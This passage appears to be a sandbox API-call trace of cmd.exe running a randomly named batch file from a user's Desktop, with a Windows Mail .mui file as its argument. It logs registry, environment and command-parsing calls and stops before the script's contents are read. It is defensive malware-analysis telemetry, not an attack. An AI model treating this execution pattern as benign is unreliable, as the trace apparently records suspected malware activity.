0x5420000 end_va = 0x5756fff entry_point = 0x5420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 824 os_tid = 0xac8 [0267.103] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0267.103] __set_app_type (_Type=0x1) [0267.103] __p__fmode () returned 0x77984d6c [0267.103] __p__commode () returned 0x77985b1c [0267.103] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0267.103] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0267.103] GetCurrentThreadId () returned 0xac8 [0267.103] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac8) returned 0x84 [0267.103] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0267.103] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0267.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0267.206] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0267.206] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xc6fe40 | out: phkResult=0xc6fe40*=0x0) returned 0x2 [0267.207] VirtualQuery (in: lpAddress=0xc6fe47, lpBuffer=0xc6fdf8, dwLength=0x1c | out: lpBuffer=0xc6fdf8*(BaseAddress=0xc6f000, AllocationBase=0xb70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.207] VirtualQuery (in: lpAddress=0xb70000, lpBuffer=0xc6fdf8, dwLength=0x1c | out: lpBuffer=0xc6fdf8*(BaseAddress=0xb70000, AllocationBase=0xb70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0267.207] VirtualQuery (in: lpAddress=0xb71000, lpBuffer=0xc6fdf8, dwLength=0x1c | out: lpBuffer=0xc6fdf8*(BaseAddress=0xb71000, AllocationBase=0xb70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0267.207] VirtualQuery (in: lpAddress=0xb73000, lpBuffer=0xc6fdf8, dwLength=0x1c | out: lpBuffer=0xc6fdf8*(BaseAddress=0xb73000, AllocationBase=0xb70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0267.207] VirtualQuery (in: lpAddress=0xc70000, lpBuffer=0xc6fdf8, dwLength=0x1c | out: lpBuffer=0xc6fdf8*(BaseAddress=0xc70000, AllocationBase=0xc70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0267.207] GetConsoleOutputCP () returned 0x1b5 [0267.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0267.244] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0267.244] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.244] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0267.254] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.254] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0267.257] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.257] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0267.688] _get_osfhandle (_FileHandle=0) returned 0x38 [0267.688] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0269.828] _get_osfhandle (_FileHandle=0) returned 0x38 [0269.828] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0271.884] GetEnvironmentStringsW () returned 0xcb7ea0* [0271.884] FreeEnvironmentStringsA (penv="A") returned 1 [0271.884] GetEnvironmentStringsW () returned 0xcb7ea0* [0271.884] FreeEnvironmentStringsA (penv="A") returned 1 [0271.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc6eda4 | out: phkResult=0xc6eda4*=0x94) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x0, lpData=0xc6edb0*=0xf0, lpcbData=0xc6edac*=0x1000) returned 0x2 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x1, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x0, lpData=0xc6edb0*=0x1, lpcbData=0xc6edac*=0x1000) returned 0x2 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x0, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x40, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x40, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x0, lpData=0xc6edb0*=0x40, lpcbData=0xc6edac*=0x1000) returned 0x2 [0271.885] RegCloseKey (hKey=0x94) returned 0x0 [0271.885] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc6eda4 | out: phkResult=0xc6eda4*=0x94) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x0, lpData=0xc6edb0*=0x40, lpcbData=0xc6edac*=0x1000) returned 0x2 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x1, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x0, lpData=0xc6edb0*=0x1, lpcbData=0xc6edac*=0x1000) returned 0x2 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x0, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x9, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x4, lpData=0xc6edb0*=0x9, lpcbData=0xc6edac*=0x4) returned 0x0 [0271.885] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc6eda8, lpData=0xc6edb0, lpcbData=0xc6edac*=0x1000 | out: lpType=0xc6eda8*=0x0, lpData=0xc6edb0*=0x9, lpcbData=0xc6edac*=0x1000) returned 0x2 [0271.885] RegCloseKey (hKey=0x94) returned 0x0 [0271.885] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43298 [0271.886] srand (_Seed=0x5bb43298) [0271.886] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"\"" [0271.886] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"\"" [0271.886] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0271.886] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcb7ea8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0271.886] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0271.886] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0271.886] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0271.887] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0271.887] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0271.887] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0271.887] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0271.887] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0271.887] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0271.887] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0271.887] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0271.887] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0271.887] GetEnvironmentStringsW () returned 0xcb80b8* [0271.887] FreeEnvironmentStringsA (penv="A") returned 1 [0271.887] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0271.887] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0271.887] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0271.887] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0271.887] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0271.887] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0271.887] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0271.887] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0271.887] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0271.888] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0271.888] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc6fb7c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0271.888] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xc6fb7c, lpFilePart=0xc6fb74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6fb74*="Desktop") returned 0x1d [0271.888] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0271.888] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc6f8f8 | out: lpFindFileData=0xc6f8f8) returned 0xcb05c8 [0271.888] FindClose (in: hFindFile=0xcb05c8 | out: hFindFile=0xcb05c8) returned 1 [0271.888] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xc6f8f8 | out: lpFindFileData=0xc6f8f8) returned 0xcb05c8 [0271.888] FindClose (in: hFindFile=0xcb05c8 | out: hFindFile=0xcb05c8) returned 1 [0271.888] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0271.888] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xc6f8f8 | out: lpFindFileData=0xc6f8f8) returned 0xcb05c8 [0271.888] FindClose (in: hFindFile=0xcb05c8 | out: hFindFile=0xcb05c8) returned 1 [0271.888] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0271.889] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0271.889] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0271.889] GetEnvironmentStringsW () returned 0xcb80b8* [0271.889] FreeEnvironmentStringsA (penv="=") returned 1 [0271.889] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0271.889] GetConsoleOutputCP () returned 0x1b5 [0272.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0272.537] GetUserDefaultLCID () returned 0x409 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xc6fcac, cchData=128 | out: lpLCData="0") returned 2 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xc6fcac, cchData=128 | out: lpLCData="0") returned 2 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xc6fcac, cchData=128 | out: lpLCData="1") returned 2 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0272.538] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0272.538] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0272.539] GetConsoleTitleW (in: lpConsoleTitle=0xcba9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0272.700] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0272.700] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0272.701] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0272.701] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0272.701] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0272.702] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0272.702] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0272.702] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0272.702] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0272.702] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0272.703] GetConsoleTitleW (in: lpConsoleTitle=0xc6f998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.703] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0272.703] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0272.703] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0272.703] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0272.703] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0272.703] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0272.703] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0272.703] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0272.703] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0272.703] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0272.703] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0272.704] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0272.704] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0272.704] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0272.704] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0272.704] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0272.704] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0272.704] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0272.704] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0272.704] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0272.704] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0272.704] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0272.704] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0272.704] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0272.704] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0272.704] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0272.704] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0272.704] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0272.704] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0272.704] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0272.704] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0272.704] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0272.704] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0272.704] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0272.704] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0272.704] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0272.704] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0272.704] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0272.704] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0272.704] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0272.704] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0272.704] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0272.704] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0272.704] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0272.704] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0272.704] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0272.704] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0272.704] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0272.704] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0272.704] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0272.704] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0272.704] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0272.704] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0272.704] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0272.704] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0272.704] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0272.704] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0272.704] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0272.704] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0272.705] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0272.705] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0272.705] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0272.705] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0272.705] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0272.705] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0272.705] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0272.705] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0272.705] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0272.705] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0272.705] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0272.705] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0272.705] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0272.705] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0272.705] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0272.705] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0272.705] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0272.705] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0272.705] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0272.705] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0272.705] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0272.705] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0272.705] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0272.706] SetErrorMode (uMode=0x0) returned 0x0 [0272.706] SetErrorMode (uMode=0x1) returned 0x0 [0272.706] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xcb05d0, lpFilePart=0xc6f4a4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6f4a4*="Desktop") returned 0x1d [0272.706] SetErrorMode (uMode=0x0) returned 0x1 [0272.706] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0272.706] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0272.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.709] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0xc6f250, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f250) returned 0xcbb128 [0272.709] FindClose (in: hFindFile=0xcbb128 | out: hFindFile=0xcbb128) returned 1 [0272.709] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0272.709] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0272.709] GetConsoleTitleW (in: lpConsoleTitle=0xc6f724, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.709] ApiSetQueryApiSetPresence () returned 0x0 [0272.709] ResolveDelayLoadedAPI () returned 0x745414a0 [0272.710] SaferWorker () returned 0x0 [0272.722] SetErrorMode (uMode=0x0) returned 0x0 [0272.722] SetErrorMode (uMode=0x1) returned 0x0 [0272.722] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xcbad10, lpFilePart=0xc6f5d4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xc6f5d4*="vRnqNMBW.bat") returned 0x2a [0272.722] SetErrorMode (uMode=0x0) returned 0x1 [0272.722] wcsspn (_String=" \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"", _Control=" \x09") returned 0x1 [0272.722] CmdBatNotificationStub () returned 0x1 [0272.722] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc6f664, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0272.723] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0272.723] _get_osfhandle (_FileHandle=3) returned 0xb4 [0272.723] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.723] _get_osfhandle (_FileHandle=3) returned 0xb4 [0272.723] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.723] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, 